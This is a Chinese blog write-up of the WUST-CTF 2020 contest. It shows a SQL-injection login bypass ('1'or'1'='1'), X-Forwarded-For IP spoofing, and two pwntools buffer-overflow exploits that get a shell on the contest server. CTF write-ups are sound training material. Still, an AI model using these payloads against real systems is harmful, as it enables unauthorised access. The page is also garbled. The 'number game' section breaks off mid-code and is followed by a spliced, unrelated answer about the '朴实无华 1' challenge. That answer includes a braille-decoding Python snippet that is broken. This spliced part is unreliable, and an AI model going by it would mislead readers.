WUST-CTF2020(武汉科技大学第一届"WUST-CTF"网络安全竞赛)WP

本文详细介绍了武汉科技大学第一届WUST-CTF网络安全竞赛的解题过程,涵盖Web、PWN、Crypto等多个类别。在Web部分,讲解了如何利用漏洞获取信息;在PWN环节,展示了getshell的技巧;而在Crypto领域,通过大数运算、RSA等题目解析加密解密方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Web

check in

修改maxlength,删除按钮的disabled,输入作者名52HeRtz即可登录
收到窗口信息一个博客地址,进入。
Ctrl+U查看源码,在末尾发现一半flag
在这里插入图片描述
继续找在“远古的博客”中找到另一半
在这里插入图片描述

wctf2020{can_y0u_can_a_can_a5_a_c@nner_can_Can_@_can}

admin(不会web勉强做出)

用户名:

admin

JSP万能密码:

1'or'1'='1	

登录后页面提示,必须本地ip才能访问,想到用抓包添加XFF来伪造IP
在这里插入图片描述
Action->Send to Repeater->Go
在这里插入图片描述
页面提示用GET传参,停止抓包,在原网址末尾添加

?ais=520

抓包,重复上面的操作,得到新提示,用POST传参
在这里插入图片描述
与GET类似,用hackbar POST

wust=1314

后得到提示离flag很近了,得到一串字符

4dz  aste.ubuntu.com/p/    https://p  Rqr  cSf2

在这里插入图片描述
将字符串HTML解码
在这里插入图片描述
将网址拼接起来得:

https://paste.ubuntu.com/p/cSf24dzRqr

进入得

d2N0ZjIwMjB7bjB3X3lvdV9rbjB3X3RoZV9iYXNpY18wZl9zcWxfYW5kX2h0dHB9

base64解码得:

wctf2020{n0w_you_kn0w_the_basic_0f_sql_and_http}

PWN

getshell

没什么好说的,真·签到题

from pwn import*
#r=process('./getshell')
r=remote('47.97.40.187',12333)
sys_addr=0x0804851b
payload='a'*0x18+'a'*4+p32(sys_addr)
r.sendline(payload)
r.interactive()
wctf2020{E@sy_get_shel1}

getshell2

在这里插入图片描述
在这里插入图片描述
没有buf段让我们写入"/bin/sh",也没有现成的"/bin/sh"让我们使用,但是需要知道的是只需要"sh"便能getshell
注意到这里的read允许的最大长度为36,buf可容纳的长度为0x18=24,所以实现栈溢出覆盖返回地址的长度为28,所以只有8个字节能让我们写syscall
如果我们调用plt表的system函数地址,是需要继续压入一个system返回地址的,这两个地址的长度已经达到了8个字节,没有位置来输入"sh"的地址,所以想到程序里是否有call system直接让我们调用,这样就不用压入返回地址,就能省4个字节来压入"sh"的地址
在这里插入图片描述
在shell函数的汇编代码里找到了,所以将栈溢出后的返回地址直接改为0x08048529就行了,现在找"sh"的地址,用ROPgadget
在这里插入图片描述
exp:

from pwn import*
#r = process('./getshell-2')
r = remote('47.97.40.187', 12334)
sh_addr = 0x08048670
sys_addr = 0x08048529
payload = flat(['a'*28, sys_addr, sh_addr])
r.sendline(payload)
r.interactive()
wctf2020{Sh_Als0_w0rks}

number game

整数溢出
讲讲我做题中的思路:
写了个C++程序测试数字:

#include<iostream>
#include<climits>
#include<math.h>
using namespace std;
int main(){
   
	int a;
	cout<<INT_MAX<<endl;//打印出int能取的最大值
	cin>>a;
	cout<<a<<endl;
	if (a<0){
   
		a=-a;
		if(a
### WUST CTF 2020 朴实无华 1 挑战详情与解决方案 #### 挑战概述 WUST CTF 2020 中的“朴实无华 1”是一个相对基础的信息隐藏类题目。参与者需要通过分析给定文件或提示来找到隐藏的信息并最终获取 flag。 #### 解决方案详解 对于此挑战,下载下来的文件可能看似一张普通的图片[^1]。然而,在右键点击该图像并查看其属性中的备注部分时,会发现存在一段盲文编码的内容。这段盲文字母实际上包含了指向下一步解谜的关键线索。 为了继续破解这一阶段的任务,可以利用在线工具或是编写简单的脚本来实现从盲文到常规字符集之间的转换工作。经过这样的处理之后,得到的结果字符串即为所需的 flag 形式:`wctf2020{y$0$u_f$1$n$d$_M$e$e$e$e$e}`。 值得注意的是,“朴实无华 1”的设计旨在考察参赛者对不同数据表示形式的理解以及快速检索有效信息的能力。这类问题通常不需要复杂的编程技巧,而是依赖于细致入微的观察力和灵活运用各种资源解决问题的方法。 ```python # Python 示例代码用于展示如何解析盲文至ASCII码(假设已知映射关系) braille_to_ascii = { "⠠⠁": 'a', "⠠⠃": 'b', ... , "⠠⠵": 'z' } def decode_braille(braille_string): decoded_message = "" words = braille_string.split(' ') for word in words: letters = [braille_to_ascii[char] if char in braille_to_ascii else '?' for char in word] decoded_word = ''.join(letters).capitalize() decoded_message += f"{decoded_word} " return decoded_message.strip() print(decode_braille("输入你的盲文")) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值